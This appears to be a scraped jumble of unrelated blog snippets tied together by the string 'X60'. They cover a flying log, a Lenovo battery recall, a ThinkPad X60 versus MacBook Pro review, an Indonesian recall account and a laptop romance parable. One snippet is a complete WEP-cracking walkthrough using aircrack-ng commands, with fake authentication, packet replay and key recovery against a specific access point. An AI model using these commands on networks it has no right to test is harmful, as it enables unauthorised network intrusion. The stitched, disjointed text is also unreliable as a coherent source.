…about 1 hour trying to solve that annoying issue, and then I realize there was a f** wifi switch turned off right in front of my face. #FAIL

Went flying with my friend Karl this morning. Made a few landings at Keystone (42J), Williston (X60), and a few on the grass strip at “Flying Ten” (0J8) before returning to Gainesville (GNV). Karl has a great Cessna C182 and wanted to get a little practice flying from the right seat, since he’s going to take his flight instructor rating sometime in the future.

At first injection with the Intel pro wireless cards was impossible. Then came the ipwraw driver. Now, we no longer need the ipwraw as the iwl3945 card supports injection. Most linux distros now ship with this driver.

Follow these steps for a succesful WEP crack in Ubuntu:

download necessary files
sudo apt-get install aircrack-ng

place card in monitor mode
sudo airmon-ng start wlan0

test injection
sudo aireplay-ng -9 -e linksys -a 00:14:6C:7E:40:80 mon0
(0% means injection not working)

capture data and write to file called output
sudo airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w output mon0

fake authentication
sudo aireplay-ng -1 0 -e linksys -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

replay mode
sudo aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0

run aircrack
sudo aircrack-ng -z -b 00:14:6C:7E:40:80 output*.cap

Lenovo is recalling batteries from its ThinkPad line of laptops, warning users that some batteries may be permanently damaged due to certain errors.

The company is offering free replacements for batteries that do not recharge or suffer from “irreparable damage,” according to Lenovo’s support Web site.

Users need to run a diagnostics tool to see if batteries show any of those symptoms. The tool can be downloaded from Lenovo’s support site. If it indicates the battery is either damaged, shows sudden drops in the fuel gauge or fails to recharge, then the battery may need to be replaced.

Eligibility for a free replacement also depends on the laptop model and specific battery installed. Only a limited number of ThinkPad batteries qualify for a free replacement, the company said on its support site. The recall applies to worldwide customers.

Lenovo did not respond to requests for comment on the cause of the error. However, the company wrote on its support site that this was “not a safety recall and does not pose a safety hazard.” The recall was issued by the company, not by a U.S. government agency.

The U.S. Consumer Safety Protection Commission in June 2007 asked Lenovo to recall about 100,000 ThinkPad batteries that could overheat and cause a fire. Those batteries were manufactured by Sanyo Electric Co. Ltd.

The laptops affected by this issue include the ThinkPad R60, R61, T60, T61, X60, X61 models with battery part numbers 42T4546, 42T4566, 92P1141, 42T4550, 42T4567, 42T4568, 92P1169, 92P1173, 93P5028, 93P5030.

Just going to put this out there as the first post since it is a decision I have struggled with for eons. My perspective is from a PC user, having used many laptops, and recently bought the Macbook Pro.

I will be comparing 2 specific products, not the overall brands.

• Apple Macbook Pro, 17-inch: 2.33GHz (MA611LL/A), 4GB RAM
• Lenovo / IBM Thinkpad X60 Tablet, 12-inch, 1.66GHz, 3GB RAM

First the Thinkpad X60 Tablet, this compact machine is a tough workhorse. I have had it for one year, with very high usage for a student. Physical review, it has almost no flex and feels very sturdy. It gets very hot at times, sometimes to the point where I think it will crash but it just keeps running. I have Speedfan test its temperature, usually at 60-80 degrees C. The solid black metal casing can withstand a lot of abuse. I have it without a case in my backpack and it is with me 24/7. Don’t get me wrong, I treat my electronics with the utmost care but this computer can handle much more. I can hold it in one hand and feel sure that it will be fine. I keep mine on about 16 hours a day.

On the Thinkpad software side, of course it runs Windows. I have Vista Business 32bit. During the school year, the tablet feature is used everyday. The X series tablet is IMO the best 12.1 inch tablet you can get in the market. I tried my colleagues’ HP tablet and Toshiba tablet, and none matches the X60.

I might be influenced by something I like to call “social reassurance”, because everyone around me says good things about Thinkpads. They’re also a rarity on college campuses, where as they are much more prevalent in corporate settings.

Now the Apple Macbook Pro. My 17-inch screen behemoth beauty has been pulling on my time more and more often. I don’t really judge computers by looks but I appreciate the modern simplistic design Macbooks have (although nothing says “I’m down for business” more than the conservative Thinkpad). People say Thinkpads have the best keyboards in the industry, but I enjoy the keyboard on. There is less resistance on the keys, relative to my X60, which is a more comfortable for tired fingers. Holding this 17-incher in one hand feels a bit uncomfortable, and I can feel the computer flex just a bit. Magnetic charging plug, a definite plus. I use a PC mouse on this because there should def be 2 buttons and a scroll on all mice. The trackpad is fine, with the multi-touch a plus, but still 1 button.

One the software side, the computer seems to be more responsive in terms of speed. The OS is clean and attractive visually. I definitely do more multimedia work on the Macbook.

If I were to offer a recommendation, I would still have to go with the Thinkpad. It is definitely a close choice for me, and that is saying something from a person who once thought that Macs were not worth anything. I am now a fan of the the Apple Macbook but the Thinkpad edges out on top because of value and durability. The Thinkpad X60 is more expensive than average laptops but it has lasted me more than any PC laptop I have had, and it has received the most use. The strong brand and quality of Thinkpads are best known to those that own one. The laptop model with most computers in space is the Thinkpad.

Hmmm, kira – kira hampir sebulan yang lalu ThinkPad X60 saya mengalami kejadian yang aneh, terlihat di Power Manager baterainya sudah terisi 100 % namun lampu indikator baterai berkedip dan berwarna oranye, dan ketika software Power Manager maka akan terlihat notifikasi seperti dibawah.

Irreparable damage to the battery has been detected. Replace the battery with a new one.

Walaupun Power Manager menunjukan bahwa batrai sudah terisi 100 % namun apabila AC adaptor dicabut maka laptop pun akan mati, jadi seakan – akan batrai tidak mau berkerja, alias tidak mau dicharge dan juga tidak bisa mengeluarkan daya.

Pada awalnya sempat bingung juga dan sudah kepikiran bahwa baterai ini sudah rusak dan berniat untuk cari baterai baru, dan ternyata baterai untuk ThinkPad X60 tergolong susah untuk dicari . Saya sudah cari di gudangbatre tapi juga tidak ada. Akhirnya saya cari tau penyebabnya dan secara tidak sengaja search via Google ketemu dengan artikel yang membahas tentang Power Manager di ThinkPad. Di bagian comment-nya juga banyak yang mempunyai masalah yang sama dengan saya. Kemudian dari comment itu pula saya tahu bahwa Lenovo pada tahun 2007 mengeluarkan program Battery Recall http://www.lenovo.com/batteryprogram. Lalu saya mencoba cek apakah baterai saya yang lama ini (buatan Sony) terkena recall, dan ternyata benar, baterai yang buatan Sony ini bermasalah sehingga terkena program Recall.

Kemudian saya mengikuti acuan yang sudah disediakan pada website resmi Lenovo tersebut untuk recall program, setelah mengisi data – data yang diperlukan ada pemberitahuan via email saya harus menunggu paling lama 4 minggu untuk menunggu baterai pengganti. Lalu sekitar seminggu setelah itu orang dari IBM Malaysia mengirimkan email saya untuk mengkonfirmasi alamat email yang akan digunakan sebagai tujuan baterai pengganti. Dan akhirnya setelah menunggu selama seminggu baterai baru pun datang wah senangnya, akhirnya bisa kembali mobile lagi. Begitu saya lihat, kali ini baterai untuk Laptop baru saya adalah buatan SANYO, yah saya harap baterai ini bakal berjalan lancar dan awet , baterai yang lama pun dibawa kembali oleh kurir untuk dikembalikan ke pabriknya. Hehe ada untungnya juga kalo baterai ThinkPad X60 itu susah dicari, jadinya saya tidak membeli baterai baru dan menghemat uang saya sampai 1 juta rupiah (bisa buat beli yang lain) . Saya sungguh merasa puas dengan service yang diberikan oleh Lenovo/IBM ini, walaupun saya membeli Notebook ini second hand, tetapi tetap berlaku bettery recall programnya.

Long ago, there was a IBM T43p.  She is very smart, and does things quite reliably, but she cannot do too many things at once, and she does not look very pretty, so her owner trade her in for a Macbook Pro.  The Macbook Pro was indeed very shiny, and she can run things much faster in parallels.  The owner was happy, and he learned quite a bit about the Macbook Pro.  It was a lovely journey, and they both had a lot of fun, but the owner was a greedy one, he started seeing this petite one when the Macbook Pro stayed home.  The petite was the Lenovo X60, who was in no match with the Macbook Pro when comparing their beauty.  However, X60 is just much lighter and smaller, she was loaded with a very open-sourced mind: Linux.  The combination of these three seems to play a very exotic role in the owner’s mind.  He became obsessed with X60’s quality and they were seemed to be together in a lot of events and circumstances.  The relationship lasted again for quite some time, until the Owner is again tired of it.  Apparently, the owner thought that the X60’s open-source mind was not yet matured enough for him.  He recognized that he wanted somebody who can be ready to work with him whenever he feels like, and stop and sleep whenever he does not need her.  X60 couldn’t do it well enough; whenever he needs her, she was a little slow on getting ready, and whenever he wants her to go to sleep, she sometimes became restless.  Finally the owner made up his mind, he started to see this hot one called Macbook.  She is the beauty with the combination of a Macbook Pro and the X60.  She had both the shininess and the  lightness. And when the owner needs her, she could be there in a short delay.  She may have a slightly closed mind than the X60, but they are very similar in terms of thoughts.  Therefore, the owner and the Macbook lives happily ever after… so far.

Pelos vistos ainda há poucas unidades do U60/X60GT a circular, e apenas encontrei esta review…

I just read an article on GottaBeMobile about how Rob Bushway, having tried out both the Lenovo X60 and the Fujitsu P1610, is planning on getting both of them for his mobile computing needs. The P1610 would be his ultra-mobile computer, while the X60 would be his mobile workhorse for desktop and mobile work that requires a lot more processing power (and screen space).

All I have to say is, “me, too!” Now, how to convince the hubby about this???
